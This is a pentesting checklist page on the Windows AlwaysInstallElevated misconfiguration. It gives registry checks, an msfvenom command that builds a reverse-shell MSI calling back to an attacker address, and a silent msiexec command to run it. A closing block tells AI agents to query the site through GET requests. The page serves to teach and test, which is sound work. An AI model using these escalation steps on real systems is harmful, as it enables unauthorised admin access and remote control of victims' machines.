# Always Install Elevated

### Overview

The **Always Install Elevated** policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.

`AlwaysInstallElevated` is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the "AlwaysInstallElevated" registry key is configured with a value of "1" in the Windows Registry. When this registry key is enabled, it allows non-administrator users to install software packages with elevated privileges.

### How it Works

1. **Elevation of Installations**: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
2. **UAC Bypass**: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software.

### Check if Vulnerable 

Run the below command and see if it returns 1.

```bat
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

### Privilege Escalation Steps

1. **Generate the Malicious MSI Package**: \
   Use `msfvenom` to create a malicious MSI file that will initiate a reverse shell connection back.

   ```bash
   msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
   ```
2. Set up the listener and transfer the msi file to the victim.
3. On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system.

   ```bat
   msiexec /i c:\users\user1\desktop\dbs.msi /quiet /qn /norestart
   ```

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/always-install-elevated>
2. <https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/AlwaysInstallElevated.md>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/group-privileges/always-install-elevated.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.